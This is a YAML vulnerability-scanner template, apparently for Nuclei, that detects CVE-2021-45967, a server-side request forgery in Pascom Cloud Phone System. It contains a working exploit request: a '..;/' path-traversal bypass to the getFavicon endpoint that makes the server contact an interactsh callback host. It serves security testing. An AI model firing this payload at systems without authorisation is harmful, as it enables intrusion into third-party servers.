30 lines
831 B
YAML
30 lines
831 B
YAML
id: CVE-2021-45967
|
|
|
|
info:
|
|
name: Pascom CPS Server-Side Request Forgery
|
|
author: dwisiswant0
|
|
severity: high
|
|
description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.
|
|
reference:
|
|
- https://kerbit.io/research/read/blog/4
|
|
classification:
|
|
cve-id: CVE-2021-45967
|
|
tags: cve,cve2021,pascom,ssrf
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" # Triple parent because endpoint access via backend (parent of index CMS)
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/03/28 |